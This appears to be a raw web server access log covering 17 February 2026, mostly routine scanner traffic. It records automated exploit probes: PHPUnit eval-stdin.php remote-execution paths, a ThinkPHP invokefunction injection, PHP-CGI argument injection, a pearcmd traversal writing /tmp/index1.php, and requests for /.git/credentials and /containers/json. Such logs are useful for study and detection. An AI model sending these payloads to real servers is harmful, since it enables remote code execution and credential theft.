222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:11 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:11 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:12 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:13 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:13 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:14 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:15 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:15 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:16 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:16 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:17 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:18 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:18 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:19 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:20 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:20 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:21 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:21 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:22 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:23 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:23 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:24 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:24 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:25 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:08:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:07:20:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:07:33:41 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:07:40:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:07:45:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 35.203.210.153] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[17/Feb/2026:07:50:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.157.150.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[17/Feb/2026:07:55:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:08:03:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:08:11:07 +0000] 404 - GET http 222.117.41.51 "/.git/credentials" [Client 195.178.110.162] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" "-" +[17/Feb/2026:08:21:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:08:23:09 +0000] 400 - - http localhost "-" [Client 167.99.148.142] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:08:23:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:08:31:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:08:36:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 176.65.139.8] [Length 1033] [Gzip -] "Hello World/1.0" "-" +[17/Feb/2026:08:38:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:08:47:16 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:08:49:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:09:13:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:09:23:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:09:29:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.130.141.193] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[17/Feb/2026:09:35:32 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 173.212.241.115] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:09:35:33 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 173.212.241.115] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:09:35:33 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:33 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 173.212.241.115] [Length 154] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:34 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:34 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:34 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:34 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:35 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:35 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:35 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:36 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:36 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:36 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:38 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:38 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:38 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:39 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:39 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:39 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:39 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:40 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:40 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:40 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:41 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:41 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:41 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:41 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:42 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:42 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:42 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:43 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:43 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:43 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:44 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:44 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:44 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:44 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:45 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:45 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:45 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:35:46 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:09:36:17 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:09:37:20 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:09:46:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:09:47:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 65.49.20.66] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:10:02:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:10:04:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.91.64.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" "-" +[17/Feb/2026:10:04:04 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Feb/2026:10:04:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:10:14:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 135.237.127.225] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:10:20:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:10:27:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:10:30:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:10:31:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:10:53:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:11:19:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:11:23:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:11:24:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:11:38:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 20.127.224.63] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[17/Feb/2026:11:43:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:11:46:15 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:11:54:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:12:01:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 115.231.78.11] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" "-" +[17/Feb/2026:12:01:33 +0000] 200 - GET http 222.117.41.51 "/" [Client 115.231.78.11] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" +[17/Feb/2026:12:01:33 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Feb/2026:12:01:33 +0000] 404 - GET http 222.117.41.51 "/robots.txt" [Client 115.231.78.11] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" +[17/Feb/2026:12:05:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 3.129.187.38] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[17/Feb/2026:12:05:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 3.129.187.38] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[17/Feb/2026:12:06:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.129.187.38] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:12:07:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.129.187.38] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:12:09:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:12:10:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.129.187.38] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:12:19:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:12:28:47 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:12:29:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:12:36:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:12:37:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:13:02:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:13:10:11 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:13:14:20 +0000] 200 - GET http 